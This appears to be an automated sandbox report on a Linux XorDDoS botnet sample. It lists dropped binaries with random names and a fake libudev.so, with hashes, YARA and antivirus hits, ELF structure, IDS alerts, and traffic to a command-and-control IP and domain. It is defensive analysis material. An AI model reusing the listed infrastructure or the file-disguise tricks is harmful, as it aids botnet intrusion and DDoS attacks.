SHA-256:	C474CECF57E197A9730CB9F9185A9F3D04771C99DF5E8012298C783161E6BB97
SHA-512:	A61F7C48EC52C72B7862491A90A678211A433D675943DE6841F5B075FBB67523ABCA9E30C2014A01403F5D0623F39DA0D2C7B4C0E264E09F802B301B93C21649
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/oigyzaiygp, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/oigyzaiygp, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/oigyzaiygp, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/oigyzaiygp, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/otlzwyqefc

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197589598922325
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojr:/fUywKQ7Fb1pNL/p52fjQn36Eur
MD5:	3CAB282FBF544A8C5DA93E8A6E8649D0
SHA1:	A104019BC2AFFB758BE6B0C9F733F04E95CAEBDA
SHA-256:	999853E6BE27F095C714AB01E8286DAB4EA5276F21A67519AF2F5C0E372D2A0A
SHA-512:	23CBE46CBBA20E17573C380A4484EEC311B6314CFFA4B0ADF13712974F0C2D2F232CAC3496EF5C2450F1230371FE7D36A81396FE005844101958F6534139B508
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/otlzwyqefc, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/otlzwyqefc, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/otlzwyqefc, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/otlzwyqefc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/qxzsiorokf

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197579258712602
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojK:/fUywKQ7Fb1pNL/p52fjQn36EuK
MD5:	D660D3565AA30310004C75F37E3FE19F
SHA1:	16A029E2EF90AFCF69676D287AAAC14E4842C839
SHA-256:	D9F3D7442F5CB981EE8E01661428E0758C16A269972799DBCE4517983E8865FC
SHA-512:	043F81708E19A45D97C7EBC107660F915BF9902ACD52ADB166A783038E6144438C2C95593D8939330E32426BA435BE21CBD0E59E5AD98287FB109B45CC5AA35C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/qxzsiorokf, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/qxzsiorokf, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/qxzsiorokf, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/qxzsiorokf, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/snluqxjnyb

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, missing section headers at 548576
Category:	dropped
Size (bytes):	438272
Entropy (8bit):	6.3524887571064825
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266y2:/fUywKQ7Fb1pNL/p52V
MD5:	25B252EE7BFAE0248F71E5221681034A
SHA1:	E64273B283B275E65632F805B5A93F6C25081DFD
SHA-256:	1FD26806B5A1E1D931D7B232A98898DA41841CC0F58CA935A1696340E877D018
SHA-512:	4E585485BD324A1458828EDE496B4A728A5B84D5AD80A8DBCF4388353763EA4A40CF640A547E0CBA90AA381A13B40AEBAE1957728DC749A8B4A92C8785C6212F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/snluqxjnyb, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/snluqxjnyb, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/snluqxjnyb, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/sosfbbrzmx

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197593359466777
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojd:/fUywKQ7Fb1pNL/p52fjQn36Eud
MD5:	01FD1F9249B1844A8C8D2D32CEDC38B7
SHA1:	C4DA5B557072F6341872355B1D814E03B430B284
SHA-256:	AA621DBF0813B1C6EE4A740B9FC686B17F976E4FFCA8574C17765E7E531A1B51
SHA-512:	F1907933428C703BD57734393D348A5C598A1A26502F2B511C19F3FCB0D0CD82CA95957DBB65BCC4F3C295818130768773DD7BAE80208B68B4FA9A82AD28506F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/sosfbbrzmx, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/sosfbbrzmx, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/sosfbbrzmx, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/sosfbbrzmx, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/uhjkqkcgma

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197573820318344
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojZ:/fUywKQ7Fb1pNL/p52fjQn36EuZ
MD5:	9D2BE3B2E820CF7206AAD0DC28D827DD
SHA1:	7F21E8E2FA8159E8E74BF86C22CBEB8022D60109
SHA-256:	261352A336A63FBF91AEB7B07635073338B83B7CBC3517644E1199150B68FCDC
SHA-512:	FE5E42603CC98FFC9872146949F87F1375610150AFA5A7FA1886EAD80918EC8E8573AD15AAA5CDD48DC58F15613BB5CFD4559CC352657BC0474C6684AF9E3FBF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uhjkqkcgma, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uhjkqkcgma, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uhjkqkcgma, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uhjkqkcgma, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/uzqdvpyngy

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.1975864637530895
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojl:/fUywKQ7Fb1pNL/p52fjQn36Eul
MD5:	53241E7C3D48F7919DC80796D016A705
SHA1:	D13C397C47B9FA887342211477283A9B65304B55
SHA-256:	951EB9A2E1B13BF7F3CCB79C0AA8291A9BBC09CC031009505EB7D58BA796682E
SHA-512:	E33ADC8156162F4C2CADEE3F6B48049BE9A67C1C1AC9B036D2B46AAC7F34A807E91992198CFA0D9676F3E76BB5BA88773C5AD925371A6578D9AE2459A503642C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uzqdvpyngy, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/uzqdvpyngy, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/uzqdvpyngy, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uzqdvpyngy, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/vnihfmehfy

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197596303234039
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojT:/fUywKQ7Fb1pNL/p52fjQn36EuT
MD5:	F0F21DF0836E951D36BB440812753052
SHA1:	92751A7027898887FCA72DDC5049C51D7DBBD69F
SHA-256:	ED5EFF7DE47308606D30B57E460C78F47E831CE54A62497C18F2622454C059A0
SHA-512:	C10E657BBE5328046D05F793846A28A3F18009466E8E5DF5072F54A0F2AC98A7257C076013D9B0DD741736AEAFD8A2705957D1B6E27A90C735319AF791A6DFF9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/vnihfmehfy, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/vnihfmehfy, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/vnihfmehfy, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/vnihfmehfy, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/bin/wutujskjnm

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548649
Entropy (8bit):	6.197590102089639
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36EojG:/fUywKQ7Fb1pNL/p52fjQn36EuG
MD5:	890231C9558B66F036F3C8F7CEBB5D72
SHA1:	92879087E2123F34D9D516F94BA14F7DF40EA562
SHA-256:	00FFE5D1A0A57BE1E33F98B8291A7BBD0F38C8563F51614ACDE1249866A3995B
SHA-512:	A4187CFC45C7EC7CA9E4156355C6F4FA1A05926A699D538E9209B18E6CBCC0E9FD2361C6213E0796EE34F7CBD640234E2054EE25E6D46BDE6118E976A93DF41D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/wutujskjnm, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/bin/wutujskjnm, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/bin/wutujskjnm, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/wutujskjnm, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

/usr/lib/libudev.so

Download File

Process:	/tmp/UDMp3dZ7nc.elf
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Category:	dropped
Size (bytes):	548638
Entropy (8bit):	6.197538131219834
Encrypted:	false
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojh:/fUywKQ7Fb1pNL/p52fjQn36Euh
MD5:	22CD21F5CFC3EA409F3A05585D903949
SHA1:	D48C82B3CE4460930518A924A51BAB5C496B38B0
SHA-256:	004FEC424E843FF98113F97BDE2D6717F99975A2504AB3EFA42C12474A62D828
SHA-512:	3BE30393B65E4C1279EA8F3E076C6538701EB178148A0D546A391AB9D0741C99DEB707A1BC051FB5EEC26B25877499A0069950DC8EB1302F598492EA070E1BF9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security Rule: Linux_Trojan_Xorddos_2aef46a6, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: Linux_Trojan_Xorddos_884cab60, Description: unknown, Source: /usr/lib/libudev.so, Author: unknown Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/lib/libudev.so, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
Entropy (8bit):	6.197538131219834
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	UDMp3dZ7nc.elf
File size:	548'638 bytes
MD5:	22cd21f5cfc3ea409f3a05585d903949
SHA1:	d48c82b3ce4460930518a924a51bab5c496b38b0
SHA256:	004fec424e843ff98113f97bde2d6717f99975a2504ab3efa42c12474a62d828
SHA512:	3be30393b65e4c1279ea8f3e076c6538701eb178148a0d546a391ab9d0741c99deb707a1bc051fb5eec26b25877499a0069950dc8eb1302f598492ea070e1bf9
SSDEEP:	12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eojh:/fUywKQ7Fb1pNL/p52fjQn36Euh
TLSH:	F0C45C56E283E2F7C82705B0134BF7BF4620B6359461CD86B7989D5AB9338F22A4D353
File Content Preview:	.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	547576
Section Header Size:	40
Number of Section Headers:	26
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	4
.text	PROGBITS	0x8048110	0x110	0x681f8	0x0	0x6	AX	16
__libc_freeres_fn	PROGBITS	0x80b0310	0x68310	0x100f	0x0	0x6	AX	16
__libc_thread_freeres_fn	PROGBITS	0x80b1320	0x69320	0x1db	0x0	0x6	AX	16
.fini	PROGBITS	0x80b14fc	0x694fc	0x1c	0x0	0x6	AX	4
.rodata	PROGBITS	0x80b1520	0x69520	0x152e0	0x0	0x2	A	32
__libc_subfreeres	PROGBITS	0x80c6800	0x7e800	0x30	0x0	0x2	A	4
__libc_atexit	PROGBITS	0x80c6830	0x7e830	0x4	0x0	0x2	A	4
__libc_thread_subfreeres	PROGBITS	0x80c6834	0x7e834	0x8	0x0	0x2	A	4
.eh_frame	PROGBITS	0x80c683c	0x7e83c	0x60a0	0x0	0x2	A	4
.gcc_except_table	PROGBITS	0x80cc8dc	0x848dc	0x11b	0x0	0x2	A	1
.tdata	PROGBITS	0x80cd9f8	0x849f8	0x14	0x0	0x403	WAT	4
.tbss	NOBITS	0x80cda0c	0x84a0c	0x2c	0x0	0x403	WAT	4
.ctors	PROGBITS	0x80cda0c	0x84a0c	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x80cda14	0x84a14	0xc	0x0	0x3	WA	4
.jcr	PROGBITS	0x80cda20	0x84a20	0x4	0x0	0x3	WA	4
.data.rel.ro	PROGBITS	0x80cda24	0x84a24	0x2c	0x0	0x3	WA	4
.got	PROGBITS	0x80cda50	0x84a50	0x8	0x4	0x3	WA	4
.got.plt	PROGBITS	0x80cda58	0x84a58	0xc	0x4	0x3	WA	4
.data	PROGBITS	0x80cda80	0x84a80	0xb40	0x0	0x3	WA	32
.bss	NOBITS	0x80ce5c0	0x855c0	0x6778	0x0	0x3	WA	32
__libc_freeres_ptrs	NOBITS	0x80d4d38	0x855c0	0x14	0x0	0x3	WA	4
.comment	PROGBITS	0x0	0x855c0	0x422	0x0	0x0		1
.shstrtab	STRTAB	0x0	0x859e2	0x116	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x849f7	0x849f7	6.2040	0x5	R E	0x1000	.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x849f8	0x80cd9f8	0x80cd9f8	0xbc8	0x7354	3.6649	0x6	RW	0x1000	.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4	.note.ABI-tag
TLS	0x849f8	0x80cd9f8	0x80cd9f8	0x14	0x40	2.6610	0x4	R	0x4	.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T15:27:53.413618+0100	2021326	ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)	1	192.168.2.23	51452	8.8.8.8	53	UDP
2025-01-03T15:27:53.413618+0100	2020381	ET MALWARE DDoS.XOR Checkin	1	192.168.2.23	55858	137.175.90.213	1522	TCP
2025-01-03T15:27:53.421515+0100	2021326	ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)	1	192.168.2.23	39078	8.8.4.4	53	UDP
2025-01-03T15:27:53.433409+0100	2021326	ET MALWARE Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)	1	192.168.2.23	33405	1.1.1.1	53	UDP
2025-01-03T15:27:53.472788+0100	2020381	ET MALWARE DDoS.XOR Checkin	1	192.168.2.23	55858	137.175.90.213	1522	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 15:27:53.429117918 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:27:53.433916092 CET	1522	55858	137.175.90.213	192.168.2.23
Jan 3, 2025 15:27:53.433978081 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:27:53.467979908 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:27:53.472758055 CET	1522	55858	137.175.90.213	192.168.2.23
Jan 3, 2025 15:27:53.472788095 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:27:53.477600098 CET	1522	55858	137.175.90.213	192.168.2.23
Jan 3, 2025 15:27:54.012259007 CET	1522	55858	137.175.90.213	192.168.2.23
Jan 3, 2025 15:27:54.012320042 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:27:55.136070967 CET	43928	443	192.168.2.23	91.189.91.42
Jan 3, 2025 15:28:00.511435032 CET	42836	443	192.168.2.23	91.189.91.43
Jan 3, 2025 15:28:02.047092915 CET	42516	80	192.168.2.23	109.202.202.202
Jan 3, 2025 15:28:16.125193119 CET	43928	443	192.168.2.23	91.189.91.42
Jan 3, 2025 15:28:26.363775969 CET	42836	443	192.168.2.23	91.189.91.43
Jan 3, 2025 15:28:32.506829977 CET	42516	80	192.168.2.23	109.202.202.202
Jan 3, 2025 15:28:55.031683922 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:28:55.037085056 CET	1522	55858	137.175.90.213	192.168.2.23
Jan 3, 2025 15:28:57.079428911 CET	43928	443	192.168.2.23	91.189.91.42
Jan 3, 2025 15:29:17.556569099 CET	42836	443	192.168.2.23	91.189.91.43
Jan 3, 2025 15:29:56.463236094 CET	55858	1522	192.168.2.23	137.175.90.213
Jan 3, 2025 15:29:56.468161106 CET	1522	55858	137.175.90.213	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 15:27:53.413618088 CET	51452	53	192.168.2.23	8.8.8.8
Jan 3, 2025 15:27:53.421425104 CET	53	51452	8.8.8.8	192.168.2.23
Jan 3, 2025 15:27:53.421514988 CET	39078	53	192.168.2.23	8.8.4.4
Jan 3, 2025 15:27:53.421700954 CET	53367	53	192.168.2.23	8.8.8.8
Jan 3, 2025 15:27:53.429017067 CET	53	53367	8.8.8.8	192.168.2.23
Jan 3, 2025 15:27:53.433044910 CET	53	39078	8.8.4.4	192.168.2.23
Jan 3, 2025 15:27:53.433408976 CET	33405	53	192.168.2.23	1.1.1.1
Jan 3, 2025 15:27:53.448013067 CET	53	33405	1.1.1.1	192.168.2.23
Jan 3, 2025 15:27:53.448136091 CET	33405	53	192.168.2.23	1.1.1.1
Jan 3, 2025 15:27:53.454808950 CET	53	33405	1.1.1.1	192.168.2.23

DNS Queries

